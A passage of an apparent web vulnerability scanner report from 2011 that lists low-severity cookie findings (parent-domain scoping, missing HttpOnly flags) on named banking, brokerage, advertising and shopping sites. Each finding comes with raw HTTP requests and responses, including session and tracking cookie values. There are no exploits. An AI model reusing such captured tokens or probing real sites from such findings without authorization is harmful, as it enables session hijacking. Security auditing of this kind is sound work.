Cookie: BizoID=55f5fe79-12b4-4f78-9976-61924d438e85; BizoData=xpA78UaP5mY4YDpjM3cPh9Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KQFMYVM1J6enaj5XcunNcMDa7Re6IGD4lDGXtlaauKpHAd6xyMUDLG6HwNFYBuERpuip6J7BXd0x4sE9pUJC88Pe5yXHOj6bWJ8aODe9cOOkiim9Da6XiirwxBAB0ZFDipA0aleYkLyGipuiicoxOXJii2rplrpQCQEipwV9h67ETqsE1eipWwwnuFtpqEzDeP3Y84mqpw7c8rqipRMEYPOEhN8UMj4XYITcDlTehMXv6yypp6AmSipxPddYpylx7e4dpBDiij57vFe2oBf0ipmt6RRlAydgIWkGDyfisfDPHdMovfSDMpZP3LipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6lnG4WL41W3AH0xNl7tETxisC5GEKyPhHoyiihEliiiihEZXwieie; BizoNetworkPartnerIndex=3

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Content-Language: en-US
Date: Mon, 25 Apr 2011 23:44:11 GMT
Location: http://ad.bizo.com/pixel?id=1258184&t=2
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=55f5fe79-12b4-4f78-9976-61924d438e85; Domain=.bizographics.com; Expires=Tue, 25-Oct-2011 11:44:11 GMT; Path=/
Set-Cookie: BizoData=BiimYs2dCnnkYokR5LALIdNQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KRwyz8QeClGZaj5XcunNcMDa7Re6IGD4lOgzJypdKRL6Ad6xyMUDLG7Ls3W4E4jF1liisFhqr12LzsIxjybldL0GQrQ8ohAZLAMaODe9cOOkiim9Da6XiirwxBAB0ZFDipA0aleYkLyGipuiicoxOXJii2rplrpQCQEipwV9h67ETqsE1eipWwwnuFtpqEzDeP3Y84mqpw8axzZEGMHjfOEhN8UMj4XaoP57SMbkTjDOsfxe0q98KOVcdy2PXFii1PU6e2biipKbWwErwOA1uvGg1WadM37je21ySjBqI9OZvePk1jYeANuipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6lnG4WL41W3AH0xNl7tETxisC5GEKyPhHoyiihEliiiihEZXwieie; Domain=.bizographics.com; Expires=Tue, 25-Oct-2011 11:44:11 GMT; Path=/
Content-Length: 0
Connection: keep-alive


14.72. http://www.bridgefront.com/cart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bridgefront.com
Path:   /cart/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cart/ HTTP/1.1
Host: www.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:23:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Set-Cookie: osCsid=sggkjb8k1c1rugrrvf2g0d37e3; path=/cart/; domain=bridgefront.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25447

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="LTR" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>BridgeFront - Shopping
...[SNIP]...

14.73. https://www.fs.ustrust.com/login/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fs.ustrust.com
Path:   /login/login.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login/login.aspx?sgt=1 HTTP/1.1
Host: www.fs.ustrust.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:27:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
geh-svr-hex: 3D2F794B
Set-Cookie: Bear=HdC5r0QnFpMuvDTYknZMKN4FD4TbXTCUXG9mmgSSpfc=; domain=.fs.ustrust.com; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 79822


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head lang="en-us"><met
...[SNIP]...

14.74. http://www.is3.com/about/contactUs.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.is3.com
Path:   /about/contactUs.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/contactUs.do HTTP/1.1
Host: www.is3.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 26 Apr 2011 13:58:56 GMT
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 13:58:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI CURa ADMa DEVa OUR BUS COM NAV", policyref="/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vvivob45vz2sv1nc3pbgld55; path=/; HttpOnly
Set-Cookie: VisitorInfo=AffiliateID=9000&SubAffiliateID=&CampaignID=_UNDEFINED&HttpReferrer=_NO_REFERER&DateRecorded=4/26/2011 9:58:56 AM; domain=.is3.com; expires=Wed, 25-Apr-2012 13:58:56 GMT; path=/
Vary: Accept-Encoding
Content-Length: 22842


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="ctl00_ctl00_Head1">
   
<!-- BEGIN RESOURCE: is3_site\content\html_head_main
...[SNIP]...

14.75. https://www.merrilledge.com/m/pages/home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /m/pages/home.aspx HTTP/1.1
Host: www.merrilledge.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:27:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=jLP3XoAxGsv1v6MwPZhahlP/aoO3xH/srhMcrJj795J+eDNFXiPfjzck1kD4CBi+6ie4KrwamlTHaXTZUdECRzrFky9gNvwqK2gfsTdEDm7sAur5XVP4PPYin3ZpmEGZhp4U9tI/R2PBhf10C0GUszchafmuD9bl4ok1Tou4xpWvp8+gJofMVxln5UHKDCa81PkeNNVr9tnGgUbb8xfUqJ9mQ+4UmQUBAvTOqlILImkN5L5gXWD34cRgwFSZ2KnJ3H2WELiFxhYRFU/W8/5hb7Ab0vdhSiKgU1mzlw6G++AaFuJs+7z65oKRdeBCqK0hIz3tim19s96RERtkf9rfjHj+6RDI79fjrabVGOlnraDPyBxJbqaBTLfWCRw+ylCtGUKvwL6+os3qLez4GsDok2Qd+n4qvsQdjjUilaWTMSP27nak6lbRwCk4b/M4No0d4wzcrSvMyENoATzMp8aftIfSjmRgRvGUNASAKrTSpR5rfw6e36o6v3gAJa9Ivvp8bVC7cNorr2VzTikkqJI1i1lWvbV9SNzGVXk61fudxdZpjJjPAMIp9cah6rKP6ckESa6k8l1TR7oiXNRlH9EEi7eiYAWvwxgHlp0pcxiP0RMD9/1rRGHkXk3lzz8V7861; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=341ce30bc7594740a1c8d88f714e0605; domain=.merrilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 107200


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...

14.76. http://www.paretologic.com/download/pchealthadvisor/revenuewire/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paretologic.com
Path:   /download/pchealthadvisor/revenuewire/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /download/pchealthadvisor/revenuewire/ HTTP/1.1
Host: www.paretologic.com
Proxy-Connection: keep-alive
Referer: http://www.cleanallspyware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: http://dl3.paretologic.com/webair/dl3/downloads/pchealthadvisor/en/ParetoLogic%20PC%20Health%20Advisor.exe
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.4
Set-Cookie: pl_20=740837; expires=Wed, 25-Apr-2012 13:59:05 GMT; path=/; domain=paretologic.com
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 13:59:04 GMT
Content-Length: 229

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://dl3.paretologic.com/webair/dl3/downloads/pchealthadvisor/en/ParetoLogic%20PC%20Health%2
...[SNIP]...

15. Cookie without HttpOnly flag set  previous  next
There are 164 instances of this issue:


15.1. https://account.snap.com/signup.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://account.snap.com
Path:   /signup.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signup.php HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: http://www.snap.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:49:28 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Set-Cookie: PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-t
...[SNIP]...

15.2. http://ads.adxpose.com/ads/ads.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_289667 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4F7536F996FEB4760F63E1BC935B1B5E; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 14:21:08 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...

15.3. http://afreshbunch.com/about.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://afreshbunch.com
Path:   /about.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /about.htm HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/?page=login
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.5.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 23126
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:02:09 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; path=/
Set-Cookie: ASPSESSIONIDSSTDDTRS=ICCEHBADCBLIPHIBGONINFAE; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:03:09 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...

15.4. http://assets.trialpay.com/tr/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://assets.trialpay.com
Path:   /tr/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tr/?u=%2Fabout%2Fpress-releases%2F%3Fyear%3D2007 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: assets.trialpay.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 14:25:25 GMT
Server: Apache
Set-Cookie: tpsess=fvvvvvulqmr4r26j1pkontns7l3001c880969669; expires=Sun, 24-Apr-2016 14:25:25 GMT; path=/; domain=.trialpay.com
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: si=Iitt8Ait; expires=Sun, 24-Apr-2016 14:25:25 GMT; path=/; domain=.trialpay.com
Set-Cookie: sk=7fef1580a3c331af; expires=Sun, 24-Apr-2016 14:25:25 GMT; path=/; domain=.trialpay.com
Set-Cookie: u_ui=deleted; expires=Mon, 26-Apr-2010 14:25:24 GMT; path=/; domain=.trialpay.com
Set-Cookie: u_ui=deleted; expires=Mon, 26-Apr-2010 14:25:24 GMT; path=/; domain=merchant.trialpay.com
Set-Cookie: u_uk=deleted; expires=Mon, 26-Apr-2010 14:25:24 GMT; path=/; domain=.trialpay.com
Set-Cookie: u_uk=deleted; expires=Mon, 26-Apr-2010 14:25:24 GMT; path=/; domain=merchant.trialpay.com
Set-Cookie: u_ul=deleted; expires=Mon, 26-Apr-2010 14:25:24 GMT; path=/; domain=.trialpay.com
Set-Cookie: u_ul=deleted; expires=Mon, 26-Apr-2010 14:25:24 GMT; path=/; domain=merchant.trialpay.com
Set-Cookie: u_sr=deleted; expires=Mon, 26-Apr-2010 14:25:24 GMT; path=/; domain=.trialpay.com
Set-Cookie: u_sr=deleted; expires=Mon, 26-Apr-2010 14:25:24 GMT; path=/; domain=merchant.trialpay.com
Content-Type: text/html
Content-Length: 0


15.5. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://contextlinks.netseer.com
Path:   /dsatserving2/servlet/BannerServer

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dsatserving2/servlet/BannerServer?tagid=1139&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&adh=40&adw=590 HTTP/1.1
Host: contextlinks.netseer.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: netseer_v3_gi="1327,10542,www.marketminute.com,0,0,1,imp3fd315f009766d06,1303536932410,"; netseer_v3_lvi="2:usr3fd49cb9a7122f52:1303083764824,1303536932417,aHR0cDovL3d3dy5tYXJrZXRtaW51dGUuY29tLw,US-TX-623-Dallas"; netseer_v3_gp="1000,1,www.identityguard.com,0,0,4,pxl3fe0b24b3b7c7dd3,1303674392792,"; netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824,10:CAESELOuaNIo-ALjWWVJnFruZF0:1303614597862,11:EXTERNAL:1303614599357"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID"
Set-Cookie: JSESSIONID=1D6BCE0733992C64CC0150683040A44D.dsat2; Path=/dsatserving2
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 8 Aug 2006 10:00:00 GMT
Set-Cookie: netseer_v3_gi="1017,449,www.spamlaws.com,0,0,1,imp3fe8a7f7f255a587,1303827656489,&1327,10542,www.marketminute.com,0,0,1,imp3fd315f009766d06,1303536932410,"; Version=1; Domain=.netseer.com; Max-Age=31536000; Path=/
Set-Cookie: netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824,10:CAESELOuaNIo-ALjWWVJnFruZF0:1303614597862,11:EXTERNAL:1303614599357"; Version=1; Domain=.netseer.com; Max-Age=31536000; Path=/
Set-Cookie: netseer_v3_lvi="2:usr3fd49cb9a7122f52:1303083764824,1303827656491,aHR0cDovL3d3dy5zcGFtbGF3cy5jb20vc3BhbS1ibG9ja2VyLmh0bWw,US-TX-623-Dallas"; Version=1; Domain=.netseer.com; Max-Age=31536000; Path=/
Content-Type: text/html
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 14:20:56 GMT
Content-Length: 5707


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
   <head>
       <title>NetSeer Advertisement</title>
       <meta http-equiv="pragma" content="no-cache
...[SNIP]...

15.6. http://event.adxpose.com/event.flow  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-5253809430940410%26output%3Dhtml%26h%3D600%26slotname%3D1644788465%26w%3D120%26lmt%3D1303845665%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.spamlaws.com%252Fspam-blocker.html%26dt%3D1303827665898%26bpp%3D8%26shv%3Dr20110420%26jsv%3Dr20110415%26prev_slotnames%3D8319948044%252C1020003104%252C9565114904%252C0023118579%26correlator%3D1303827663964%26frm%3D0%26adk%3D222637912%26ga_vid%3D902403751.1303827664%26ga_sid%3D1303827664%26ga_hid%3D1845423620%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D1%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D965%26bih%3D956%26fu%3D0%26ifi%3D5%26dtd%3D13%26xpc%3DgvNjmv27ZD%26p%3Dhttp%253A%2F%2Fwww.spamlaws.com&uid=ZC45X9Axu6NOUFfX_289667&xy=0%2C0&wh=120%2C600&vchannel=69114&cid=166308&iad=1303827681130-85943930735811580&cookieenabled=1&screenwh=1920%2C1200&adwh=120%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C248A7682479DBB6FED950BA84EACF87; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 104
Date: Tue, 26 Apr 2011 14:21:13 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_289667");

15.7. http://ikano.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ikano.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: ikano.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:17:42 GMT
Server: Microsoft-IIS/6.0
Content-Length: 40886
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAABCTBBA=OLEKIPADNLNANJACJFBNPLPF; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>IKANO.com - Inter
...[SNIP]...

15.8. http://learn.bankofamerica.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://learn.bankofamerica.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: learn.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:40:03 GMT
Server: Apache
Set-Cookie: JSESSIONID=56BC742EBE04D7AB3A04E71C60FEF0B1; Path=/
Content-Language: en-US
Age: 122
Content-Length: 19092
Keep-Alive: timeout=2, max=286
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Tue, 26-Apr-2011 13:40:05 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><head><title>Personal F
...[SNIP]...

